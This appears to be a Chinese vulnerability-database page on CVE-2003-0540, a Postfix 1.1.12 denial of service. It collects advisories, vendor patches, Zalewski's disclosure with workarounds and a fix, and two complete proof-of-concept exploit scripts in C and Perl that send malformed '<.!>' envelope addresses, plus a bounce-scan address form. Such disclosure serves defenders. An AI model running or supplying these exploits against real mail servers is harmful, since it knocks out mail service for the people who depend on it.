CVE-2003-0540
CVSS5.0
发布时间 :2003-08-27 00:00:00
修订时间 :2016-10-17 22:35:08
NMCOEPS    

[原文]The address parser code in Postfix 1.1.12 and earlier allows remote attackers to cause a denial of service (lock) via (1) a malformed envelope address to a local host that would generate a bounce and contains the ".!" string in the MAIL FROM or Errors-To headers, which causes nqmgr to lock up, or (2) via a valid MAIL FROM with a RCPT TO containing a ".!" string, which causes an instance of the SMTP listener to lock up.


[CNNVD]Postfix多个远程拒绝服务攻击漏洞(CNNVD-200308-157)

        
        Postfix是一款邮件服务程序。
        Postfix邮件传输代理当前存在两个漏洞,远程攻击者可以利用这些漏洞对服务程序进行拒绝服务攻击或把Postfix作为DDOS攻击代理。
        第一个漏洞是允许攻击者通过"bounce-scan"方法扫描私有保护的网络,攻击者可以提交如下类型的地址 触发:
         <[server_ip]:service!@local-host-name>
        这个地址会使Postfix连接任意IP地址及任意端口进行SMTP对话,对话失败的信息会反回给远程用户,导致敏感信息泄露。使用这个问题可产生拒绝服务攻击,通过使用多个Postfix主机,不停尝试连接特定主机,可导致主机产生拒绝服务。
        此漏洞的CANID为:CAN-2003-0468
        第二个漏洞存在与地址解析代码中,通过提供畸形邮件地址,可触发此漏洞。攻击者可以朴实服务产生一个产生bounce的队列,根据配置,可以为,或者如果用户名被检查的情况下,可以为。"mail from""Errors-To"地址必须为"<.!>"或"<.!@local-server-name>"。当准备bounce时Postfix解析和重写地址时会锁住服务。
        也可以提供合法的"MAIL FROM"进行SMTP会话,但"RCPT TO"提供类似上面所描述的地址,可导致smtp监听程序停止响应。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:wietse_venema:postfix:2000-02-28
cpe:/a:wietse_venema:postfix:1.0.21
cpe:/a:wietse_venema:postfix:1.1.11
cpe:/a:wietse_venema:postfix:2001-11-15
cpe:/o:conectiva:linux:8.0Conectiva Conectiva Linux 8.0
cpe:/a:wietse_venema:postfix:1.1.12
cpe:/a:wietse_venema:postfix:1999-09-06
cpe:/o:conectiva:linux:7.0Conectiva Conectiva Linux 7.0
cpe:/a:wietse_venema:postfix:1999-12-31

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:544Denial of Service Vulnerability in Postfix Parser Code
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0540
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0540
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-157
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000717
(UNKNOWN)  CONECTIVA  CLA-2003:717
http://lists.grok.org.uk/pipermail/full-disclosure/2003-August/007693.html
(UNKNOWN)  FULLDISC  20030804 Postfix 1.1.12 remote DoS / Postfix 1.1.11 bounce scanning
http://marc.info/?l=bugtraq&m=106001525130257&w=2
(UNKNOWN)  BUGTRAQ  20030804 Postfix 1.1.12 remote DoS / Postfix 1.1.11 bounce scanning
http://marc.info/?l=bugtraq&m=106029188614704&w=2
(UNKNOWN)  TRUSTIX  2003-0029
http://www.debian.org/security/2003/dsa-363
(VENDOR_ADVISORY)  DEBIAN  DSA-363
http://www.kb.cert.org/vuls/id/895508
(UNKNOWN)  CERT-VN  VU#895508
http://www.linuxsecurity.com/advisories/engarde_advisory-3517.html
(UNKNOWN)  ENGARDE  ESA-20030804-019
http://www.mandriva.com/security/advisories?name=MDKSA-2003:081
(UNKNOWN)  MANDRAKE  MDKSA-2003:081
http://www.novell.com/linux/security/advisories/2003_033_postfix.html
(UNKNOWN)  SUSE  SuSE-SA:2003:033
http://www.redhat.com/support/errata/RHSA-2003-251.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:251
http://www.securityfocus.com/bid/8333
(UNKNOWN)  BID  8333

- 漏洞信息

Postfix多个远程拒绝服务攻击漏洞
中危 其他
2003-08-27 00:00:00 2005-10-20 00:00:00
远程  
        
        Postfix是一款邮件服务程序。
        Postfix邮件传输代理当前存在两个漏洞,远程攻击者可以利用这些漏洞对服务程序进行拒绝服务攻击或把Postfix作为DDOS攻击代理。
        第一个漏洞是允许攻击者通过"bounce-scan"方法扫描私有保护的网络,攻击者可以提交如下类型的地址 触发:
         <[server_ip]:service!@local-host-name>
        这个地址会使Postfix连接任意IP地址及任意端口进行SMTP对话,对话失败的信息会反回给远程用户,导致敏感信息泄露。使用这个问题可产生拒绝服务攻击,通过使用多个Postfix主机,不停尝试连接特定主机,可导致主机产生拒绝服务。
        此漏洞的CANID为:CAN-2003-0468
        第二个漏洞存在与地址解析代码中,通过提供畸形邮件地址,可触发此漏洞。攻击者可以朴实服务产生一个产生bounce的队列,根据配置,可以为,或者如果用户名被检查的情况下,可以为。"mail from""Errors-To"地址必须为"<.!>"或"<.!@local-server-name>"。当准备bounce时Postfix解析和重写地址时会锁住服务。
        也可以提供合法的"MAIL FROM"进行SMTP会话,但"RCPT TO"提供类似上面所描述的地址,可导致smtp监听程序停止响应。
        

- 公告与补丁

        厂商补丁:
        Conectiva
        ---------
        Conectiva已经为此发布了一个安全公告(CLA-2003:717)以及相应补丁:
        CLA-2003:717:postfix
        链接:
        http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000717

        补丁下载:
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/postfix-1.1.13-1U70_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/postfix-1.1.13-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/postfix-doc-1.1.13-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/postfix-1.1.13-1U80_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/postfix-1.1.13-1U80_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/postfix-doc-1.1.13-1U80_1cl.i386.rpm
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-363

        MandrakeSoft
        ------------
        MandrakeSoft已经为此发布了一个安全公告(MDKSA-2003:081)以及相应补丁:
        MDKSA-2003:081:Updated postfix packages fix remote DoS
        链接:
        http://www.linux-mandrake.com/en/security/2003/2003-081.php

        补丁下载:
        Updated Packages:
        Corporate Server 2.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/postfix-1.1.13-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/SRPMS/postfix-1.1.13-1.1mdk.src.rpm
        Corporate Server 2.1/x86_64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/RPMS/postfix-1.1.13-1.2mdk.x86_64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/SRPMS/postfix-1.1.13-1.2mdk.src.rpm
        Mandrake Linux 8.2:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/postfix-20010228-20.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/SRPMS/postfix-20010228-20.1mdk.src.rpm
        Mandrake Linux 8.2/PPC:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/postfix-20010228-20.1mdk.ppc.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/SRPMS/postfix-20010228-20.1mdk.src.rpm
        Mandrake Linux 9.0:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.0/RPMS/postfix-1.1.13-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.0/SRPMS/postfix-1.1.13-1.1mdk.src.rpm
        Multi Network Firewall 8.2:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/mnf8.2/RPMS/postfix-20010228-20.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/mnf8.2/SRPMS/postfix-20010228-20.1mdk.src.rpm
        上述升级软件还可以在下列地址中的任意一个镜像ftp服务器上下载:
        
        http://www.mandrakesecure.net/en/ftp.php

        RedHat
        ------
        RedHat已经为此发布了一个安全公告(RHSA-2003:251-01)以及相应补丁:
        RHSA-2003:251-01:New postfix packages fix security issues.
        链接:https://www.redhat.com/support/errata/RHSA-2003-251.html
        补丁下载:
        Red Hat Linux 7.3:
        SRPMS:
        ftp://updates.redhat.com/7.3/en/os/SRPMS/postfix-1.1.12-0.7.src.rpm
        i386:
        ftp://updates.redhat.com/7.3/en/os/i386/postfix-1.1.12-0.7.i386.rpm
        Red Hat Linux 8.0:
        SRPMS:
        ftp://updates.redhat.com/8.0/en/os/SRPMS/postfix-1.1.12-0.8.src.rpm
        i386:
        ftp://updates.redhat.com/8.0/en/os/i386/postfix-1.1.12-0.8.i386.rpm
        Red Hat Linux 9:
        SRPMS:
        ftp://updates.redhat.com/9/en/os/SRPMS/postfix-1.1.12-1.src.rpm
        i386:
        ftp://updates.redhat.com/9/en/os/i386/postfix-1.1.12-1.i386.rpm
        Verification:
        MD5 sum Package Name
        - --------------------------------------------------------------------------
        1c17ca698971a1b5904590b97c0cbf8f 7.3/en/os/SRPMS/postfix-1.1.12-0.7.src.rpm
        d862e447c46cc4587dc96d4d44ef1a58 7.3/en/os/i386/postfix-1.1.12-0.7.i386.rpm
        e9e79099eb8e23dc0eff8f26d059cf53 8.0/en/os/SRPMS/postfix-1.1.12-0.8.src.rpm
        48e8299644a815e5dd67e67ef9aff8b5 8.0/en/os/i386/postfix-1.1.12-0.8.i386.rpm
        4c1500d10e8533eda4168a0cd193b561 9/en/os/SRPMS/postfix-1.1.12-1.src.rpm
        b3345751920862dc4ab2e82bcc0c51f9 9/en/os/i386/postfix-1.1.12-1.i386.rpm

- 漏洞信息 (22981)

Postfix 1.1.x Denial of Service Vulnerabilities (1) (EDBID:22981)
linux dos
2003-08-04 Verified
0 r3b00t
N/A [点击下载]
source: http://www.securityfocus.com/bid/8333/info

Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that this vulnerability can be exploited to use the server as a distributed denial of service tool. These attacks are reportedly possible through forcing the server to connect to an arbitrary port on an arbitrary host. 

The second vulnerability, CAN-2003-0540, is another denial of service. It can be triggered by a malformed envelope address and can cause the queue manager to lock up until the message is removed manually from the queue. It is also reportedly possible to lock the SMTP listener, also resulting in a denial of service.

/*
 postfixdos.c for 1.1.12 by r3b00t <r3b00t@tx.pl>
 ------------------------------------------------
 remote/local Postfix up to (including) 1.1.12 DoS
 discovered by lcamtuf <lcamtuf@coredump.cx>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/inet.h>

int sock = 0;

void get_response(void);
void say(char *it);

int main(int argc, char* argv[]) {
    struct hostent *hp;
    struct sockaddr_in addr;

    printf("postfixdos.c for 1.1.12 by r3b00t <r3b00t@tx.pl>\n");

    if (argc<2) {
        printf("usage: %s <smtpserver>\n", argv[0]);
        exit(0);
    }

    hp=gethostbyname(argv[1]);

    if (!hp) {
        printf("can't resolve %s\n", argv[1]);
        exit(0);
    }

    bzero((char *)&addr, sizeof(addr));

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("can't create socket\n");
        exit(0);
    }

    bcopy(hp->h_addr, (char *)&addr.sin_addr, hp->h_length);
    addr.sin_family=AF_INET;
    addr.sin_port=htons(25);

    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))!=0) {
        printf("can't connect to %s\n", argv[1]);
        close(sock);
        exit(0);
    }

    get_response();

    say("helo host\r\n");
    say("mail from: <.!>\r\n");
    say("rcpt to: <someuser123@[127.0.0.1]>\r\n");
    /* now should be freezed */

    shutdown(sock, 2);
    close(sock);

    printf("done.\n");

    return 0;
}

void get_response(void) {
    char buff[64];
    recv(sock, buff, sizeof(buff), 0);
    if (buff[0]!='2' && buff[0]!='3') printf("%s", buff);
}

void say(char *it) {
    send(sock, it, strlen(it), 0);
    get_response();
}


		

- 漏洞信息 (22982)

Postfix 1.1.x Denial of Service Vulnerabilities (2) (EDBID:22982)
linux dos
2003-08-04 Verified
0 daniels@legend.co.uk
N/A [点击下载]
source: http://www.securityfocus.com/bid/8333/info
 
Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that this vulnerability can be exploited to use the server as a distributed denial of service tool. These attacks are reportedly possible through forcing the server to connect to an arbitrary port on an arbitrary host.
 
The second vulnerability, CAN-2003-0540, is another denial of service. It can be triggered by a malformed envelope address and can cause the queue manager to lock up until the message is removed manually from the queue. It is also reportedly possible to lock the SMTP listener, also resulting in a denial of service.

#!/usr/bin/perl

#Remote Dos for postfix version 1.1.12
#tested on redhat 9.0, redhat 8.0, mandrake 9.0
#deadbeat,
#mail: daniels@legend.co.uk
#	 deadbeat@sdf.lonestar.org
#
#thanks..enjoy ;)

use IO::Socket;
if (!$ARGV[3]){
   die "Usage:perl $0 <subject> <data> <smtp host to use>\n";
}
$subject = $ARGV[0];
$junk = $ARGV[1];
$smtp_host = $ARGV[2];


$helo = "HELO $smtp_host\r\n";
$rcpt = "RCPT To:<nonexistant@127.0.0.1>\r\n";
$data = "DATA\n$junk\r\n";
$sub = "Subject: $subject\r\n";
$from = "MAIL From <.!@$smtp_host>\r\n";
print "Going to connect to $smtp_host\n";
$sox = IO::Socket::INET->new(
   Proto=> 'tcp',
   PeerPort=>'25',
   PeerAddr=>'$smtp_host',
);
print "Connected...\n";
print $sox $helo;
sleep 1;
print $sox $from;
sleep 1;
print $sox $rcpt;
sleep 1;
print $sox $sub;
sleep 1;
print $sox $data;
sleep 1;
print $sox ".\r\n\r\n";
sleep 1;
close $sox;
print "Done..should lock up Postfix 1.1.12 and below ;)\n\n";
		

- 漏洞信息 (F31486)

postfix.pl (PacketStormID:F31486)
2003-08-05 00:00:00
deadbeat  
exploit,remote,denial of service
CVE-2003-0540
[点击下载]

Remote denial of service exploit that makes use of the Postfix vulnerability discussed here.

- 漏洞信息 (F31483)

postfix1112.txt (PacketStormID:F31483)
2003-08-05 00:00:00
Michal Zalewski  lcamtuf.coredump.cx
advisory,remote,denial of service
CVE-2003-0540
[点击下载]

Postfix versions 1.1.12 and below suffers from a remote denial of service attack due to a vulnerability in the address parser code.

Good morning list,                                     ,--.   ,--.
                                                       \  /-~-\  /
======================================================= )' a a `( ========
1. Posfix 1.1.12 remote DoS (CAN-2003-0540)           .(  ,---.  ),
========================================================`(_o_o_)'=========

There is a remotely exploitable denial of service vulnerability in Postfix
up to and including 1.1.12. The vulnerability does not affect the most
current version, 2.0, due to a major overhaul of the address parsing code.
Releases prior to 1.1.9 are not vulnerable by default, but will be exposed
if append_dot_mydomain is turned off in the configuration file (see
section 3 for more details).

Recent 1.1 releases, having no publicly disclosed security problems, are
still commonly used and shipped in several popular Linux distributions,
including Red Hat 9 or Debian 3.0 (woody) - those distributions both ship
1.1.11.

The vulnerability lies in the address parser code. By supplying a remote
SMTP listener with a malformed envelope address, it is possible to,
depending on the method, either:

  - Cause the queue manager, nqmgr, to lock up permanently, effectively
    stopping any queue processing - all mail traffic supressed. Restarting
    the service has no effect - a specific entry has to be removed from
    the queue to fix the problem. For that reason, a builtin watchdog
    that restarts nqmgr after a period of nonresponsive behavior, is
    not able to cause a recovery from this condition.

    The attack can be performed by forcing the service to queue a mail
    to an address that would generate a bounce - depending on the
    configuration, it can be <nonexistent@local-server-name>, or, if user
    names are being checked, <nonexistent@[127.0.0.1]>. The "mail from" or
    "Errors-To" address should be set to "<.!>" or
    "<.!@local-server-name>". An attempt to parse and rewrite the latter
    address when preparing a bounce will lock up the service.

...or...

  - Lock up a single instance of the smtp listener in a unusable state
    that persists after the client disconnects. By repeating this,
    it is possible to DoS the service (or entire system, depending
    on the configuration) in a very effective manner.

    This can be achieved by providing any valid "MAIL FROM" in a SMTP
    conversation, and then supplying a "RCPT TO" similar to "MAIL FROM"
    in the previous example. If the server is vulnerable, the session
    should freeze at this point.

The latter approach, since it only creates a single stalled process, is a
less intrusive method of testing your systems for this issue remotely.

The attack can be detected by looking for "resolve_clnt_query: null
recipient" in your maillog. It is then necessary to find the problematic
entry in the queue and remove it manually, then restart the service.

It should be noted that it is often possible to attack instances that do
not have port 25 reachable from the Internet - envelope addresses and
certain headers such as Errors-To may very well be preserved when a
message is relayed via another system or service.


==========================================================================
2. Postfix 1.1.11 Bounce scan / DDoS agent issue (CAN-2003-0468)
==========================================================================

There is a remotely exploitable vulnerability in Postfix 1.1.11 (and
earlier versions). Postfix 1.1.12 and 2.0 is NOT affected. The problem was
apparently spotted and fixed in 1.1.12 (note 200221121 in HISTORY file),
although it has been tagged as a change preventing bogus log entries, and
not described as a security issue; there was no public information or
discussion about its implications on security forums, not prompting users
to upgrade. It might be that the significance of this problem was simply
overlooked.

Since the issue has been rediscovered during the analysis of the previous
issue, I decided it's worth mentioning here, especially since 1.1.11 is
shipped all over the place.

The problem enables an attacker to use Postfix 1.1.11 as a DDoS agent or
for bounce scans of other hosts on the Internet, or probing firewalled
internal networks. The problem is triggered by an attempt to deliver to:

  <[server_ip]:service!@local-host-name>

This address will cause Postfix to connect an arbitrary IP at an arbitrary
port and attempt to talk SMTP. The conversation will likely fail before
any user-dependent data is sent to the remote party, which limits the
exposure, but is sufficient to bounce-scan.

The address can be either sent in "RCPT TO" (the attacker would have the
right to relay to this system - which makes it a viable method of
bounce-scanning your ISP/mail account provider), in which case the sender
would then look for bounces stating the problem (SMTP conversation error,
connection timeout or connection refused), or in "MAIL FROM" / Errors-To,
in which case, the attacker can likely perform a queue timing attack to
detect whether a port is open by inserting control messages that are
intended to bounce.

When a port is open, SMTP greeting timeout occurs after a longer while,
pausing queue processing. When a port is closed, the entry is immediately
marked as deferred and queue processing continues.

It is also possible to use this problem to stage a DDoS attack, by making
a number of Postfix hosts around the world attempt to connect services on
a particular machine over and over again, until each queue entry finally
expires and is discarded or delivered to postmaster.


==========================================================================
3. Vendor status / fix and workardound information
==========================================================================

Wietse Venema has been contacted on July 27 regarding the first issue,
confirmed the problem described in #1 and released a patch to address it.
The information was then passed down to vendor-sec.

Below is a detailed fix and workaround info from the author:

  To find out your Postfix version, use the command "postconf
  mail_version".  Versions prior to 1.1 show a date instead of a
  version number (e.g., Postfix-20010228-pl08). Versions 1.1 and
  later may show a date in addition to the version number (e.g.,
  2.0.14-20030717).

  Postfix versions 2.0 and later:

    Not vulnerable, because the trivial-rewrite code was completely
    restructured. The current Postfix version is 2.0.13.

    A not vulnerable Postfix version can protect vulnerable Postfix
    systems as described in the workarounds section below.

  Postfix versions 1.1.9 .. 1.1.12:

    These are vulnerable, and are fixed by upgrading to version
    1.1.13 which will be made available via http://www.postfix.org/
    and via individual vendors, or by applying the patch below.
    The workarounds section below has instructions for sites that
    cannot upgrade Postfix immediately.

  Postfix versions prior to 1.1.9:

    These become vulnerable only when the append_dot_mydomain
    feature is set to "no" (you can verify this with the command
    "postconf append_dot_mydomain"). Use the command "postconf -e
    append_dot_mydomain=yes" to update the setting if necessary.

    Sites that must use "append_dot_mydomain=no" should either
    upgrade to a fixed Postfix version, or should apply the one-line
    patch at the end of this text. This patch has been tested with
    Postfix versions back to 19991231.

  Workarounds for Postfix versions 1.1.9 - 1.1.12:

    Verify that the append_dot_mydomain feature is set to "yes" by
    using the command "postconf append_dot_mydomain". Use the
    command "postconf -e append_dot_mydomain=yes" to update the
    setting if necessary.

    Sites that must use "append_dot_mydomain=no" should either
    upgrade to a fixed Postfix version, or should apply the one-line
    patch at the end of this text.

    Specify "resolve_dequoted_address=no" in main.cf.

    An additional workaround is needed for hosts that must forward
    mail from the Internet to, for example, primary MX hosts or to
    internal hosts.  This is because with resolve_dequoted_address=no,
    Postfix no longer recognizes user@bad.domain@good.domain as a
    mail relaying attempt.  To close this loophole, use a regular
    expression to block sender-specified routing in SMTP recipient
    addresses:

        /etc/postfix/main.cf:
            smtpd_recipient_restrictions =
                permit_mynetworks,
                check_recipient_access regexp:/etc/postfix/recipient_regexp
                ...other restrictions...
                check_relay_domains

        /etc/postfix/recipient_regexp:
            /[%!@].*[%!@]/       550 Sender-specified routing rejected

  Workarounds to protect vulnerable down-stream Postfix systems:

    Reject Errors-To: message headers with multiple routing
    operators:

        /etc/postfix/main.cf:
            header_checks = regexp:/etc/postfix/header_checks

        /etc/postfix/header_checks:
            /^errors-to:.*[%!@].*[%!@]/        reject

    Reject SMTP sender addresses with multiple routing operators:

        /etc/postfix/main.cf:
            smtpd_sender_restrictions =
                check_sender_access regexp:/etc/postfix/sender_regexp
                ...other restrictions...

        /etc/postfix/sender_regexp:
            /[%!@].*[%!@]/       550 Sender-specified routing rejected

diff -cr /tmp/postfix-1.1.12/src/trivial-rewrite/resolve.c src/trivial-rewrite/resolve.c
*** /tmp/postfix-1.1.12/src/trivial-rewrite/resolve.c	Fri Nov 22 12:32:33 2002
--- src/trivial-rewrite/resolve.c	Mon Jul 28 11:36:49 2003
***************
*** 148,153 ****
--- 148,154 ----
  	    if (saved_domain)
  		tok822_free_tree(saved_domain);
  	    saved_domain = domain;
+ 	    domain = 0;
  	}

  	/*

-- 
Did you know that clones never use mirrors?
http://lcamtuf.coredump.cx/photo/current/

























    

- 漏洞信息

10544
Postfix Malformed Envelope Address nqmgr DoS
Denial of Service
Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-08-03 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Postfix SMTP Malformed E-mail Envelope Address Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 8362
Yes No
2003-08-04 12:00:00 2009-07-11 10:56:00
Discovery credited to Michal Zalewski.

- 受影响的程序版本

Wietse Venema Postfix 1.1.13
Wietse Venema Postfix 1.1.12
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.2 i386
Wietse Venema Postfix 1.1.11
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Wietse Venema Postfix 1.0.21
+ EnGarde Secure Community 2.0
+ EnGarde Secure Community 1.0.1
+ EnGarde Secure Professional 1.5
+ EnGarde Secure Professional 1.2
+ EnGarde Secure Professional 1.1
Wietse Venema Postfix 20011115
Wietse Venema Postfix 20010228
+ Trustix Secure Linux 1.5
Wietse Venema Postfix 19991231
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Trustix Secure Linux 1.2
Wietse Venema Postfix 19990906
Conectiva Linux 8.0
Conectiva Linux 7.0
Wietse Venema Postfix 2.0
Wietse Venema Postfix 1.1.13

- 不受影响的程序版本

Wietse Venema Postfix 2.0
Wietse Venema Postfix 1.1.13

- 漏洞讨论

A denial of service attack can triggered in Postfix by a malformed envelope address which can result in a locking of the queue manager and SMTP listener.

- 漏洞利用

The following proof-of-concept exploits have been supplied:

- 解决方案

Conectiva has released advisory CLA-2003:717 with fixes to address this issue. Additional information is available in the referenced advisory. Fixes are linked below.

Debian has issued fixes. See advisory DSA-363-1 listed in the reference section for download locations.

SuSE has released advisory SuSE-SA:2003:033 with fixes to address this issue.

Mandrake has released advisory MDKSA-2003:081 with fixes to address this issue. Additional information is available in the referenced Mandrake Advisory.

Red Hat has released advisory RHSA-2003:251-01. Fix information may be gathered from the referenced advisory.

Guardian Digital has released an advisory (ESA-20030804-019) that provides updates for EnGarde Secure Linux. These updates may be applied automatically with the Guardian Digital WebTool. Please see the attached advisory for instructions on how to apply updates.

Trustix has released an advisory (TSLSA-2003-0029) that addresses this issue. Please see the attached advisory for details on obtaining and applying upgrades.

Vulnerable versions of the software can be fixed by upgrading to Postfix 1.1.13.


Wietse Venema Postfix 20011115

Wietse Venema Postfix 19991231

Wietse Venema Postfix 19990906

Wietse Venema Postfix 20010228

Wietse Venema Postfix 1.0.21

Wietse Venema Postfix 1.1.11

Wietse Venema Postfix 1.1.12

Conectiva Linux 7.0

Conectiva Linux 8.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站